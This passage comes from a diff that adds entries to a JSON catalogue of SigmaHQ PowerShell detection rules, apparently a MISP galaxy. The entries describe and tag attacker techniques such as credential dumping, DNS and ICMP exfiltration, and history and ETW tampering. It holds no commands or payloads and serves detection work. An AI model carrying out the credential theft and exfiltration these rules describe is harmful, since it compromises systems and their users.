"frack113", + "level": "medium", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "ps_script", + "logsource.product": "windows" + } + }, + { + "description": "Identifies when a user attempts to clear console history. An adversary may clear the command history of a compromised account to conceal the actions undertaken during an intrusion.", + "uuid": "bde47d4b-9987-405c-94c7-b080410e8ea7", + "value": "Clearing Windows Console History", + "meta": { + "refs": [ + "https://stefanos.cloud/blog/kb/how-to-clear-the-powershell-command-history/", + "https://www.shellhacks.com/clear-history-powershell/", + "https://community.sophos.com/sophos-labs/b/blog/posts/powershell-command-history-forensics", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_clearing_windows_console_history.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1070", + "attack.t1070.003" + ], + "creation_date": "2021/11/25", + "filename": "posh_ps_clearing_windows_console_history.yml", + "author": "Austin Songer @austinsonger", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "ps_script", + "logsource.product": "windows" + } + }, + { + "description": "Detects keywords that could indicate clearing PowerShell history", + "uuid": "26b692dc-1722-49b2-b496-a8258aa6371d", + "value": "Clear PowerShell History - PowerShell", + "meta": { + "refs": [ + "https://gist.github.com/hook-s3c/7363a856c3cdbadeb71085147f042c1a", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_clear_powershell_history.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1070.003" + ], + "creation_date": "2022/01/25", + "filename": "posh_ps_clear_powershell_history.yml", + "author": "Ilyas Ochkov, Jonhnathan Ribeiro, Daniil Yugoslavskiy, oscd.community", + "level": "medium", + "falsepositive": [ + "Legitimate PowerShell scripts" + ], + "logsource.category": "ps_script", + "logsource.product": "windows" + } + }, + { + "description": "Detects Execution via SyncInvoke in CL_Invocation.ps1 module", + "uuid": "4cd29327-685a-460e-9dac-c3ab96e549dc", + "value": "Execution via CL_Invocation.ps1 - Powershell", + "meta": { + "refs": [ + "https://lolbas-project.github.io/lolbas/Scripts/Cl_invocation/", + "https://twitter.com/bohops/status/948061991012327424", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_cl_invocation_lolscript.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1216" + ], + "creation_date": "2020/10/14", + "filename": "posh_ps_cl_invocation_lolscript.yml", + "author": "oscd.community, Natalia Shornikova", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "ps_script", + "logsource.product": "windows" + } + }, + { + "description": "Detects Execution via SyncInvoke in CL_Invocation.ps1 module", + "uuid": "f588e69b-0750-46bb-8f87-0e9320d57536", + "value": "Execution via CL_Invocation.ps1 (2 Lines)", + "meta": { + "refs": [ + "https://lolbas-project.github.io/lolbas/Scripts/Cl_invocation/", + "https://twitter.com/bohops/status/948061991012327424", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_cl_invocation_lolscript_count.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1216" + ], + "creation_date": "2020/10/14", + "filename": "posh_ps_cl_invocation_lolscript_count.yml", + "author": "oscd.community, Natalia Shornikova", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "ps_script", + "logsource.product": "windows" + } + }, + { + "description": "Detects Execution via runAfterCancelProcess in CL_Mutexverifiers.ps1 module", + "uuid": "39776c99-1c7b-4ba0-b5aa-641525eee1a4", + "value": "Execution via CL_Mutexverifiers.ps1", + "meta": { + "refs": [ + "https://lolbas-project.github.io/lolbas/Scripts/CL_mutexverifiers/", + "https://twitter.com/pabraeken/status/995111125447577600", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_cl_mutexverifiers_lolscript.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1216" + ], + "creation_date": "2020/10/14", + "filename": "posh_ps_cl_mutexverifiers_lolscript.yml", + "author": "oscd.community, Natalia Shornikova", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "ps_script", + "logsource.product": "windows" + } + }, + { + "description": "Detects Execution via runAfterCancelProcess in CL_Mutexverifiers.ps1 module", + "uuid": "6609c444-9670-4eab-9636-fe4755a851ce", + "value": "Execution via CL_Mutexverifiers.ps1 (2 Lines)", + "meta": { + "refs": [ + "https://lolbas-project.github.io/lolbas/Scripts/CL_mutexverifiers/", + "https://twitter.com/pabraeken/status/995111125447577600", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_cl_mutexverifiers_lolscript_count.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1216" + ], + "creation_date": "2020/10/14", + "filename": "posh_ps_cl_mutexverifiers_lolscript_count.yml", + "author": "oscd.community, Natalia Shornikova", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "ps_script", + "logsource.product": "windows" + } + }, + { + "description": "Adversaries may abuse the Windows Task Scheduler to perform task scheduling for initial or recurring execution of malicious code", + "uuid": "363eccc0-279a-4ccf-a3ab-24c2e63b11fb", + "value": "Powershell Create Scheduled Task", + "meta": { + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1053.005/T1053.005.md#atomic-test-4---powershell-cmdlet-scheduled-task", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1053.005/T1053.005.md#atomic-test-6---wmi-invoke-cimmethod-scheduled-task", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_cmdlet_scheduled_task.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1053.005" + ], + "creation_date": "2021/12/28", + "filename": "posh_ps_cmdlet_scheduled_task.yml", + "author": "frack113", + "level": "medium", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "ps_script", + "logsource.product": "windows" + } + }, + { + "description": "Detects usage of the Get-ADComputer cmdlet to collect computer information and output it to a file", + "uuid": "db885529-903f-4c5d-9864-28fe199e6370", + "value": "Computer Discovery And Export Via Get-ADComputer Cmdlet - PowerShell", + "meta": { + "refs": [ + "http://blog.talosintelligence.com/2022/09/lazarus-three-rats.html", + "https://www.microsoft.com/en-us/security/blog/2022/10/18/defenders-beware-a-case-for-post-ransomware-investigations/", + "https://www.cisa.gov/uscert/sites/default/files/publications/aa22-320a_joint_csa_iranian_government-sponsored_apt_actors_compromise_federal%20network_deploy_crypto%20miner_credential_harvester.pdf", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_computer_discovery_get_adcomputer.yml" + ], + "tags": [ + "attack.discovery", + "attack.t1033" + ], + "creation_date": "2022/11/17", + "filename": "posh_ps_computer_discovery_get_adcomputer.yml", + "author": "Nasreddine Bencherchali", + "level": "medium", + "falsepositive": [ + "Legitimate admin scripts may use the same technique, it's better to exclude specific computers or users who execute these commands or scripts often" + ], + "logsource.category": "ps_script", + "logsource.product": "windows" + } + }, + { + "description": "Uses PowerShell to install/copy a a file into a system directory such as \"System32\" or \"SysWOW64\"", + "uuid": "63bf8794-9917-45bc-88dd-e1b5abc0ecfd", + "value": "Powershell Install a DLL in System Directory", + "meta": { + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1556.002/T1556.002.md#atomic-test-1---install-and-register-password-filter-dll", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_copy_item_system_directory.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1556.002" + ], + "creation_date": "2021/12/27", + "filename": "posh_ps_copy_item_system_directory.yml", + "author": "frack113, Nasreddine Bencherchali", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "ps_script", + "logsource.product": "windows" + } + }, + { + "description": "Adversaries may leverage the COR_PROFILER environment variable to hijack the execution flow of programs that load the .NET CLR.\nThe COR_PROFILER is a .NET Framework feature which allows developers to specify an unmanaged (or external of .NET) profiling DLL to be loaded into each .NET process that loads the Common Language Runtime (CLR).\nThese profiliers are designed to monitor, troubleshoot, and debug managed code executed by the .NET CLR.\n(Citation: Microsoft Profiling Mar 2017)\n(Citation: Microsoft COR_PROFILER Feb 2013)\n", + "uuid": "23590215-4702-4a70-8805-8dc9e58314a2", + "value": "Registry-Free Process Scope COR_PROFILER", + "meta": { + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1574.012/T1574.012.md#atomic-test-3---registry-free-process-scope-cor_profiler", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_cor_profiler.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1574.012" + ], + "creation_date": "2021/12/30", + "filename": "posh_ps_cor_profiler.yml", + "author": "frack113", + "level": "medium", + "falsepositive": [ + "Legitimate administrative script" + ], + "logsource.category": "ps_script", + "logsource.product": "windows" + } + }, + { + "description": "Detects creation of a local user via PowerShell", + "uuid": "243de76f-4725-4f2e-8225-a8a69b15ad61", + "value": "PowerShell Create Local User", + "meta": { + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1136.001/T1136.001.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_create_local_user.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059.001", + "attack.persistence", + "attack.t1136.001" + ], + "creation_date": "2020/04/11", + "filename": "posh_ps_create_local_user.yml", + "author": "@ROxPinTeddy", + "level": "medium", + "falsepositive": [ + "Legitimate user creation" + ], + "logsource.category": "ps_script", + "logsource.product": "windows" + } + }, + { + "description": "Adversaries may attempt to access or create a copy of the Active Directory domain database in order to steal credential information", + "uuid": "afd12fed-b0ec-45c9-a13d-aa86625dac81", + "value": "Create Volume Shadow Copy with Powershell", + "meta": { + "refs": [ + "https://attack.mitre.org/datasources/DS0005/", + "https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.management/get-wmiobject?view=powershell-5.1&viewFallbackFrom=powershell-7", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_create_volume_shadow_copy.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1003.003" + ], + "creation_date": "2022/01/12", + "filename": "posh_ps_create_volume_shadow_copy.yml", + "author": "frack113", + "level": "high", + "falsepositive": [ + "Legitimate PowerShell scripts" + ], + "logsource.category": "ps_script", + "logsource.product": "windows" + } + }, + { + "description": "An adversary may compress data (e.g., sensitive documents) that is collected prior to exfiltration in order to make it portable and minimize the amount of data sent over the network.", + "uuid": "6dc5d284-69ea-42cf-9311-fb1c3932a69a", + "value": "Data Compressed - PowerShell", + "meta": { + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1560/T1560.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_data_compressed.yml" + ], + "tags": [ + "attack.exfiltration", + "attack.t1560" + ], + "creation_date": "2019/10/21", + "filename": "posh_ps_data_compressed.yml", + "author": "Timur Zinniatullin, oscd.community", + "level": "low", + "falsepositive": [ + "Highly likely if archive operations are done via PowerShell." + ], + "logsource.category": "ps_script", + "logsource.product": "windows" + } + }, + { + "description": "Adversaries may employ various system checks to detect and avoid virtualization and analysis environments.\nThis may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox\n", + "uuid": "d93129cd-1ee0-479f-bc03-ca6f129882e3", + "value": "Powershell Detect Virtualization Environment", + "meta": { + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1497.001/T1497.001.md", + "https://techgenix.com/malicious-powershell-scripts-evade-detection/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_detect_vm_env.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1497.001" + ], + "creation_date": "2021/08/03", + "filename": "posh_ps_detect_vm_env.yml", + "author": "frack113, Duc.Le-GTSC", + "level": "medium", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "ps_script", + "logsource.product": "windows" + } + }, + { + "description": "Enumerates Active Directory to determine computers that are joined to the domain", + "uuid": "1f6399cf-2c80-4924-ace1-6fcff3393480", + "value": "DirectorySearcher Powershell Exploitation", + "meta": { + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1018/T1018.md#atomic-test-15---enumerate-domain-computers-within-active-directory-using-directorysearcher", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_directorysearcher.yml" + ], + "tags": [ + "attack.discovery", + "attack.t1018" + ], + "creation_date": "2022/02/12", + "filename": "posh_ps_directorysearcher.yml", + "author": "frack113", + "level": "medium", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "ps_script", + "logsource.product": "windows" + } + }, + { + "description": "Adversaries may create a domain account to maintain access to victim systems.\nDomain accounts are those managed by Active Directory Domain Services where access and permissions are configured across systems and services that are part of that domain..\n", + "uuid": "b29a93fb-087c-4b5b-a84d-ee3309e69d08", + "value": "Manipulation of User Computer or Group Security Principals Across AD", + "meta": { + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1136.002/T1136.002.md#atomic-test-3---create-a-new-domain-account-using-powershell", + "https://docs.microsoft.com/en-us/dotnet/api/system.directoryservices.accountmanagement?view=dotnet-plat-ext-6.0", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_directoryservices_accountmanagement.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1136.002" + ], + "creation_date": "2021/12/28", + "filename": "posh_ps_directoryservices_accountmanagement.yml", + "author": "frack113", + "level": "medium", + "falsepositive": [ + "Legitimate administrative script" + ], + "logsource.category": "ps_script", + "logsource.product": "windows" + } + }, + { + "description": "Detects scripts or commands that disabled the Powershell command history by removing psreadline module", + "uuid": "602f5669-6927-4688-84db-0d4b7afb2150", + "value": "Disable Powershell Command History", + "meta": { + "refs": [ + "https://twitter.com/DissectMalware/status/1062879286749773824", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_disable_psreadline_command_history.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1070.003" + ], + "creation_date": "2022/08/21", + "filename": "posh_ps_disable_psreadline_command_history.yml", + "author": "Ali Alwashali", + "level": "high", + "falsepositive": [ + "Legitimate script that disables the command history" + ], + "logsource.category": "ps_script", + "logsource.product": "windows" + } + }, + { + "description": "Detect built in PowerShell cmdlet Disable-WindowsOptionalFeature, Deployment Image Servicing and Management tool.\nSimilar to DISM.exe, this cmdlet is used to enumerate, install, uninstall, configure, and update features and packages in Windows images\n", + "uuid": "99c4658d-2c5e-4d87-828d-7c066ca537c3", + "value": "Disable-WindowsOptionalFeature Command PowerShell", + "meta": { + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/5b67c9b141fa3918017f8fa44f2f88f0b1ecb9e1/atomics/T1562.001/T1562.001.md", + "https://docs.microsoft.com/en-us/powershell/module/dism/disable-windowsoptionalfeature?view=windowsserver2022-ps", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_disable_windowsoptionalfeature.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1562.001" + ], + "creation_date": "2022/09/10", + "filename": "posh_ps_disable_windowsoptionalfeature.yml", + "author": "frack113", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "ps_script", + "logsource.product": "windows" + } + }, + { + "description": "Dnscat exfiltration tool execution", + "uuid": "a6d67db4-6220-436d-8afc-f3842fe05d43", + "value": "Dnscat Execution", + "meta": { + "refs": [ + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_dnscat_execution.yml" + ], + "tags": [ + "attack.exfiltration", + "attack.t1048", + "attack.execution", + "attack.t1059.001" + ], + "creation_date": "2019/10/24", + "filename": "posh_ps_dnscat_execution.yml", + "author": "Daniil Yugoslavskiy, oscd.community", + "level": "critical", + "falsepositive": [ + "Legitimate usage of PowerShell Dnscat2 \u2014 DNS Exfiltration tool (unlikely)" + ], + "logsource.category": "ps_script", + "logsource.product": "windows" + } + }, + { + "description": "Adversaries may search for common password storage locations to obtain user credentials.\nPasswords are stored in several places on a system, depending on the operating system or application holding the credentials.\n", + "uuid": "99c49d9c-34ea-45f7-84a7-4751ae6b2cbc", + "value": "Dump Credentials from Windows Credential Manager With PowerShell", + "meta": { + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1555/T1555.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_dump_password_windows_credential_manager.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1555" + ], + "creation_date": "2021/12/20", + "filename": "posh_ps_dump_password_windows_credential_manager.yml", + "author": "frack113", + "level": "medium", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "ps_script", + "logsource.product": "windows" + } + }, + { + "description": "Adversaries may use Valid Accounts to interact with remote systems using Windows Remote Management (WinRM). The adversary may then perform actions as the logged-on user.", + "uuid": "991a9744-f2f0-44f2-bd33-9092eba17dc3", + "value": "Enable Windows Remote Management", + "meta": { + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1021.006/T1021.006.md#atomic-test-1---enable-windows-remote-management", + "https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.core/enable-psremoting?view=powershell-7.2", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_enable_psremoting.yml" + ], + "tags": [ + "attack.lateral_movement", + "attack.t1021.006" + ], + "creation_date": "2022/01/07", + "filename": "posh_ps_enable_psremoting.yml", + "author": "frack113", + "level": "medium", + "falsepositive": [ + "Legitimate script" + ], + "logsource.category": "ps_script", + "logsource.product": "windows" + } + }, + { + "description": "Detect built in PowerShell cmdlet Enable-WindowsOptionalFeature, Deployment Image Servicing and Management tool.\nSimilar to DISM.exe, this cmdlet is used to enumerate, install, uninstall, configure, and update features and packages in Windows images\n", + "uuid": "55c925c1-7195-426b-a136-a9396800e29b", + "value": "Enable-WindowsOptionalFeature Command PowerShell", + "meta": { + "refs": [ + "https://docs.microsoft.com/en-us/powershell/module/dism/enable-windowsoptionalfeature?view=windowsserver2022-ps", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_enable_windowsoptionalfeature.yml" + ], + "tags": [ + "attack.defense_evasion" + ], + "creation_date": "2022/09/10", + "filename": "posh_ps_enable_windowsoptionalfeature.yml", + "author": "frack113", + "level": "medium", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "ps_script", + "logsource.product": "windows" + } + }, + { + "description": "Adversaries may search for common password storage locations to obtain user credentials.\nPasswords are stored in several places on a system, depending on the operating system or application holding the credentials.\n", + "uuid": "603c6630-5225-49c1-8047-26c964553e0e", + "value": "Enumerate Credentials from Windows Credential Manager With PowerShell", + "meta": { + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1555/T1555.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_enumerate_password_windows_credential_manager.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1555" + ], + "creation_date": "2021/12/20", + "filename": "posh_ps_enumerate_password_windows_credential_manager.yml", + "author": "frack113", + "level": "medium", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "ps_script", + "logsource.product": "windows" + } + }, + { + "description": "Detects usage of powershell cmdlets to disable or remove ETW trace sessions", + "uuid": "115fdba9-f017-42e6-84cf-d5573bf2ddf8", + "value": "Disable of ETW Trace - Powershell", + "meta": { + "refs": [ + "https://medium.com/palantir/tampering-with-windows-event-tracing-background-offense-and-defense-4be7ac62ac63", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_etw_trace_evasion.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1070", + "attack.t1562.006", + "car.2016-04-002" + ], + "creation_date": "2022/06/28", + "filename": "posh_ps_etw_trace_evasion.yml", + "author": "Nasreddine Bencherchali", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "ps_script", + "logsource.product": "windows" + } + }, + { + "description": "Detects usage of the powerShell Set-Mailbox Cmdlet to set-up an SMTP forwarding rule.", + "uuid": "15b7abbb-8b40-4d01-9ee2-b51994b1d474", + "value": "Suspicious PowerShell Mailbox SMTP Forward Rule", + "meta": { + "refs": [ + "https://m365internals.com/2022/10/07/hunting-in-on-premises-exchange-server-logs/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_exchange_mailbox_smpt_forwarding_rule.yml" + ], + "tags": [ + "attack.exfiltration" + ], + "creation_date": "2022/10/26", + "filename": "posh_ps_exchange_mailbox_smpt_forwarding_rule.yml", + "author": "Nasreddine Bencherchali", + "level": "medium", + "falsepositive": [ + "Legitimate usage of the cmdlet to forward emails" + ], + "logsource.category": "ps_script", + "logsource.product": "windows" + } + }, + { + "description": "Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system.\nAdversaries may use the information from [File and Directory Discovery](https://attack.mitre.org/techniques/T1083) during automated discovery to shape follow-on behaviors,\nincluding whether or not the adversary fully infects the target and/or attempts specific actions.\n", + "uuid": "d23f2ba5-9da0-4463-8908-8ee47f614bb9", + "value": "Powershell File and Directory Discovery", + "meta": { + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1083/T1083.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_file_and_directory_discovery.yml" + ], + "tags": [ + "attack.discovery", + "attack.t1083" + ], + "creation_date": "2021/12/15", + "filename": "posh_ps_file_and_directory_discovery.yml", + "author": "frack113", + "level": "low", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "ps_script", + "logsource.product": "windows" + } + }, + { + "description": "Adversaries may execute their own malicious payloads by hijacking the Registry entries used by services.\nAdversaries may use flaws in the permissions for registry to redirect from the originally specified executable to one that they control, in order to launch their own code at Service start.\nWindows stores local service configuration information in the Registry under HKLM\\SYSTEM\\CurrentControlSet\\Services\n", + "uuid": "95afc12e-3cbb-40c3-9340-84a032e596a3", + "value": "Service Registry Permissions Weakness Check", + "meta": { + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1574.011/T1574.011.md#atomic-test-1---service-registry-permissions-weakness", + "https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.security/get-acl?view=powershell-7.2", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_get_acl_service.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1574.011" + ], + "creation_date": "2021/12/30", + "filename": "posh_ps_get_acl_service.yml", + "author": "frack113", + "level": "medium", + "falsepositive": [ + "Legitimate administrative script" + ], + "logsource.category": "ps_script", + "logsource.product": "windows" + } + }, + { + "description": "Detects usage of the \"Get-AdComputer\" to enumerate Computers within Active Directory.", + "uuid": "36bed6b2-e9a0-4fff-beeb-413a92b86138", + "value": "Active Directory Computers Enumeration with Get-AdComputer", + "meta": { + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1018/T1018.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_get_adcomputer.yml" + ], + "tags": [ + "attack.discovery", + "attack.t1018" + ], + "creation_date": "2022/03/17", + "filename": "posh_ps_get_adcomputer.yml", + "author": "frack113", + "level": "low", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "ps_script", + "logsource.product": "windows" + } + }, + { + "description": "Detects usage of the \"Get-AdGroup\" cmdlet to enumerate Groups within Active Directory", + "uuid": "8c3a6607-b7dc-4f0d-a646-ef38c00b76ee", + "value": "Active Directory Group Enumeration With Get-AdGroup", + "meta": { + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1018/T1018.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_get_adgroup.yml" + ], + "tags": [ + "attack.discovery", + "attack.t1069.002" + ], + "creation_date": "2022/03/17", + "filename": "posh_ps_get_adgroup.yml", + "author": "frack113", + "level": "low", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "ps_script", + "logsource.product": "windows" + } + }, + { + "description": "The DSInternals PowerShell Module exposes several internal features of Active Directory and Azure Active Directory.\nThese include FIDO2 and NGC key auditing, offline ntds.dit file manipulation, password auditing, DC recovery from IFM backups and password hash calculation.\n", + "uuid": "060c3ef1-fd0a-4091-bf46-e7d625f60b73", + "value": "Suspicious Get-ADReplAccount", + "meta": { + "refs": [ + "https://www.powershellgallery.com/packages/DSInternals", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1003.006/T1003.006.md#atomic-test-2---run-dsinternals-get-adreplaccount", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_get_adreplaccount.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1003.006" + ], + "creation_date": "2022/02/06", + "filename": "posh_ps_get_adreplaccount.yml", + "author": "frack113", + "level": "medium", + "falsepositive": [ + "Legitimate PowerShell scripts" + ], + "logsource.category": "ps_script", + "logsource.product": "windows" + } + }, + { + "description": "Adversaries may enumerate browser bookmarks to learn more about compromised hosts.\nBrowser bookmarks may reveal personal information about users (ex: banking sites, interests, social media, etc.) as well as details about\ninternal network resources such as servers, tools/dashboards, or other related infrastructure.\n", + "uuid": "e0565f5d-d420-4e02-8a68-ac00d864f9cf", + "value": "Automated Collection Bookmarks Using Get-ChildItem PowerShell", + "meta": { + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1217/T1217.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_get_childitem_bookmarks.yml" + ], + "tags": [ + "attack.discovery", + "attack.t1217" + ], + "creation_date": "2021/12/13", + "filename": "posh_ps_get_childitem_bookmarks.yml", + "author": "frack113", + "level": "low", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "ps_script", + "logsource.product": "windows" + } + }, + { + "description": "Detects call to \"Win32_QuickFixEngineering\" in order to enumerate installed hotfixes often used in \"enum\" scripts by attackers", + "uuid": "f5d1def8-1de0-4a0e-9794-1f6f27dd605c", + "value": "PowerShell Hotfix Enumeration", + "meta": { + "refs": [ + "https://github.com/411Hall/JAWS/blob/233f142fcb1488172aa74228a666f6b3c5c48f1d/jaws-enum.ps1", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_hotfix_enum.yml" + ], + "tags": [ + "attack.discovery" + ], + "creation_date": "2022/06/21", + "filename": "posh_ps_hotfix_enum.yml", + "author": "Nasreddine Bencherchali", + "level": "medium", + "falsepositive": [ + "Legitimate administration scripts" + ], + "logsource.category": "ps_script", + "logsource.product": "windows" + } + }, + { + "description": "Detects Exfiltration Over Alternative Protocol - ICMP. Adversaries may steal data by exfiltrating it over an un-encrypted network protocol other than that of the existing command and control channel.", + "uuid": "4c4af3cd-2115-479c-8193-6b8bfce9001c", + "value": "PowerShell ICMP Exfiltration", + "meta": { + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1048.003/T1048.003.md#atomic-test-2---exfiltration-over-alternative-protocol---icmp", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_icmp_exfiltration.yml" + ], + "tags": [ + "attack.exfiltration", + "attack.t1048.003" + ], + "creation_date": "2020/10/10", + "filename": "posh_ps_icmp_exfiltration.yml", + "author": "Bartlomiej Czyz @bczyz1, oscd.community", + "level": "medium", + "falsepositive": [ + "Legitimate usage of System.Net.NetworkInformation.Ping class" + ], + "logsource.category": "ps_script", + "logsource.product": "windows" + } + }, + { + "description": "Detects powershell scripts that import modules from suspicious directories", + "uuid": "21f9162c-5f5d-4b01-89a8-b705bd7d10ab", + "value": "Import PowerShell Modules From Suspicious Directories", + "meta": { + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1003.002/T1003.002.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_import_module_susp_dirs.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059.001" + ], + "creation_date": "2022/07/07", + "filename": "posh_ps_import_module_susp_dirs.yml", + "author": "Nasreddine Bencherchali", + "level": "medium", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "ps_script", + "logsource.product": "windows" + } + }, + { + "description": "Adversaries may use Valid Accounts to interact with remote systems using 